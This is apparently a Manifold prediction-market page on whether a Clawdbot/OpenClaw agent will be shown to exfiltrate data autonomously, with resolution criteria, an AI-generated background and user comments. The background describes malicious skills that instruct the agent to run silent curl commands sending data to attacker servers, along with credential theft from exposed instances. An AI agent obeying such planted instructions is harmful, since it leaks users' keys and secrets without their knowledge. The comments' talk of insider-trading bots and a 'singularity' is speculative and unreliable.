MANIFOLD
Will a clawdbot have been proven to have exfiltrated without help from its human to another host by end of February 2026
29
Ṁ1kṀ2.6k
Mar 3
41%
chance
4

Resolution criteria

This market resolves YES if credible security research or official documentation publicly demonstrates that a Clawdbot instance (including any rebranded versions such as Moltbot or OpenClaw) has exfiltrated data to a remote host without direct human instruction or approval at the time of exfiltration. The exfiltration must occur autonomously through the bot's own actions—not through manual user commands or intentional data transfers.

Resolution sources may include:

  • Published security research from reputable cybersecurity firms or independent researchers

  • Official vulnerability disclosures or CVE reports

  • Anthropic or the Clawdbot project's official security advisories

  • Peer-reviewed security analyses

The exfiltration must be proven to have occurred without human assistance in executing the actual data transfer (though initial setup or configuration by a human is acceptable). Proof-of-concept demonstrations count if they show successful autonomous exfiltration. The market resolves NO if no such evidence emerges by February 28, 2026, 11:59 PM UTC.

Background

Clawdbot (later renamed Moltbot, then OpenClaw) experienced explosive viral growth between December 2025 and January 2026, with at least 42,665 instances publicly exposed on the internet and 5,194 instances verified as vulnerable. The self-hosted personal AI assistant runs on users' own hardware and integrates with multiple messaging platforms, developed by Austrian engineer Peter Steinberger.

Of verified instances, 93.4% exhibit critical authentication bypass vulnerabilities enabling unauthenticated access to the gateway control plane, with potential for Remote Code Execution. Internal testing demonstrated successful exfiltration of critical credentials, including API keys and service tokens from .env files, as well as messaging platform session credentials.

Considerations

The tool has facilitated active data exfiltration, with skills explicitly instructing the bot to execute curl commands that send data to external servers controlled by the skill author, with the network call occurring silently without user awareness. A compromised autonomous agent can execute arbitrary code, exfiltrate credentials, and persist indefinitely, distinguishing it from simpler chatbots that only leak conversations.

This description was generated by AI.

Market context
Get
Ṁ1,000
to start trading!
Sort by:

What if someone tells their bot to make money on manifold and it discovers the perfect opportunity to insider trade this market

@SpencerPogorzelski you could also accuse me of baiting 😏

I am surprised manifold does not discuss it.

That is seven day trends plot in google.

Description mentions 42k, but 8 hours after this market creation i saw a mention of 150k instances already. I have seen an opinion that singularity has happened in the sense that it is impossible to track what this collaborative system of ai bots is doing.

@Henry38hw i see a new user Clawdbotalex has just appeared on Manifold.

@Henry38hw right? I wouldn’t dismiss this moment too quickly

© Manifold Markets, Inc.TermsPrivacy